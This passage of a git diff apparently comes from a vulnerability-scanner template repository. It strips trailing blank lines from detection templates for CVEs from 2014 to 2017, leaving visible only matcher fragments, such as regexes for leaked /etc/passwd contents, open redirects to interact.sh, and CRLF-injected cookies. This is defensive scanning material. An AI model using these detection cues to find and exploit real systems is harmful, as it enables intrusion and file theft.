a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index c955eabdd9..e4ab574638 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -49,5 +49,3 @@ http: part: body regex: - "root:.*:0:0:" - - diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index d624fa6266..9dffd38eb5 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -51,5 +51,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index bfb3e1f8f8..e8c35b0343 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index d83fd8d6e4..4818bef18d 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 3b375ac2bb..fbe9010a8b 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 4cd8be2c63..c7297935e2 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 583ed03647..7f4a224f7f 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 2aff16e670..74203611c2 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 3d8d74ad82..e633489ab6 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 3bc150c078..0026928b20 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 5cc2dd9a52..3da1089d53 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 8e4dbde27c..3ea4c114fb 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index 59fa693dc6..14b7abd0e4 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index bb60adca0d..543be1df05 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -47,5 +47,3 @@ http: part: header words: - 'Set-Cookie: webadminU=' - - diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 78030eda3d..6363b12a89 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index b18c6c499e..3df4922046 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -30,5 +30,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - - diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index f6b4d9b339..65ab3e2e18 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 26661844ff..ced325ad3b 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 4f5e3677ad..0b1b4d2c61 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 3c9417155e..7baf16d79f 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index fb6c23a360..ef712bba32 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 9c0bcbc472..913055efd1 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -55,5 +55,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index e6e40e943f..04f395734f 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 9c6e97b2b1..85b0f488aa 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 76b71af819..6f7bf973b3 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -40,5 +40,3 @@ http: words: - "text/html" part: header - - diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 0a61ff61c3..aa326fb3b5 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index c77f12399f..0691e57f57 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index a6edad41a4..3f3c4de28c 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -35,5 +35,3 @@ http: words: - "Illegal character 0x0 in state" part: body - - diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 7dc15c4914..babe465959 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index e890fd9ddc..b34dfad448 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -36,5 +36,3 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and - - diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 105829716d..0b3cabc99d 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -47,5 +47,3 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ab-google-map-travel")' condition: and - - diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 1552d8734c..f7487d37a1 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 7b396b3f74..e4d9ac8971 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -31,5 +31,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - - diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 00615aae13..a5a52148df 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 269b8a173b..9cb879ccc7 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index c37bbad0a2..dfc630774c 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -44,5 +44,3 @@ http: - "data-session-id=" case-insensitive: true condition: or - - diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 80e9e494dd..b34a1d19dc 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index ab429c22df..ebf754310c 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index e93879594a..8d57066dac 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -39,5 +39,3 @@ http: - type: regex regex: - "root:[x*]:0:0:" - - diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index f07182c941..ed95ff2b40 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 3a53b0d30d..dfd20bda0e 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -44,5 +44,3 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and - - diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 8774c715a7..e3b6946a87 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -42,5 +42,3 @@ http: - 'status_code_2 == 200' - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and - - diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 3aaf9fd654..46a1273290 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index f23b10c05a..d9e59174b6 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index d3e6d9a1ec..2ee42fcb33 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 7862722eba..8bb53cf4dd 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 2127281d23..6ceda69e3f 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 56c7c5216f..59c3399f70 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -30,5 +30,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index d5b5dc39f1..ee63cf3545 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 5b46d68c01..c123772ed4 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -29,5 +29,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index d391bbf751..a31c2f96fc 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -30,5 +30,3 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - - diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 0991255cd4..08f1d99ac5 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 02e5542a5a..df75875d9c 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index c92c98ced8..c4a0d355fc 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -60,5 +60,3 @@ http: - type: status status: - 400 - - diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 34a46080dd..e30a742823 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 13cbdb1606..d2e7562f3a 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -35,5 +35,3 @@ http: part: body words: - "" - - diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index cec755d224..ae22fdf5e5 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -40,5 +40,3 @@ http: part: header words: - text/html - - diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 90bbf274a7..da58178b3c 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 575236ed70..278f264a7a 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -32,5 +32,3 @@ http: part: body regex: - "root:.*:0:0:" - - diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 46e938ef3f..9bd22d4801 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -31,5 +31,3 @@ http: words: - '{{md5({{num}})}}' part: body - - diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index d0ff37574f..4d839acc00 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 8b87effe79..1da31ff342 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -58,5 +58,3 @@ http: part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - - diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index a45955eeea..222859c369 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -41,5 +41,3 @@ http: part: header words: - "application/xml" - - diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 527b10948e..6f929c78f4 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -28,5 +28,3 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - - diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 1414d7da26..258594b64c 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -38,5 +38,3 @@ http: part: header words: - text/ - - diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 64ab33869b..c0567939c9 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -37,5 +37,3 @@ http: - "confluence-init.properties" - "View Default Decorator" condition: and - - diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 4a9791c6a6..01fd5cdc21 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -29,5 +29,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 3255a68998..e2ce486f4f 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -43,5 +43,3 @@ http: - 'contains(body_2, "")' - '!contains(body_3, "")' condition: and - - diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index f083374fd4..f267840aa2 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -38,5 +38,3 @@ http: status: - 200 - 500 - - diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index eab942e450..9d463856d8 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index f5ac74f2ff..b88d017bf0 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index e4cd57b8c9..794dba76ff 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -34,5 +34,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index def83e50ff..180ddbc9ea 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index a6bf228421..eb99e6faee 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -34,5 +34,3 @@ http: - type: regex regex: - "root:.*:0:0:" - - diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 4ded5a2a5c..e514a51f79 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -28,5 +28,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 20241c0477..585689c767 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -27,5 +27,3 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' - - diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index dc21a94d5c..4c2bf4c1db 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 400 - - diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index a04e9735ef..b3096f1395 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -43,5 +43,3 @@ http: group: 1 regex: - 'Success "([a-z]+)"' - - diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index 4f5bfaae5b..d7827955b4 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 1d47d1161d..4b2595f051 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 9170bbc92a..39dbc07bf1 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -34,5 +34,3 @@ http: words: - "Memory map" part: body - - diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 5ef821fcc7..83618c205c 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -42,5 +42,3 @@ http: - type: status status: - 204 - - diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 0f2ca667dd..7454a2b6c9 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -40,5 +40,3 @@ http: part: header words: - text/html - - diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index b2518d5c49..50bc78e888 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -40,5 +40,3 @@ http: part: header words: - text/html - - diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index d603a674c1..99941684d2 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 500 - - diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index 16b7652c47..ae3496d18c 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -42,5 +42,3 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and - - diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index 711f1a6d0a..fbea33fe21 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 14a2f54cfb..2eac717189 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -29,5 +29,3 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' part: header - - diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 1ce0a3f6a4..239420d1ed 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index f24b8d1617..e4749942a5 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -35,5 +35,3 @@ http: words: - 'Mogwailabs: CHECKCHECK' part: header - - diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index f26ef6da34..6bbf479445 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -44,5 +44,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-10271.yaml 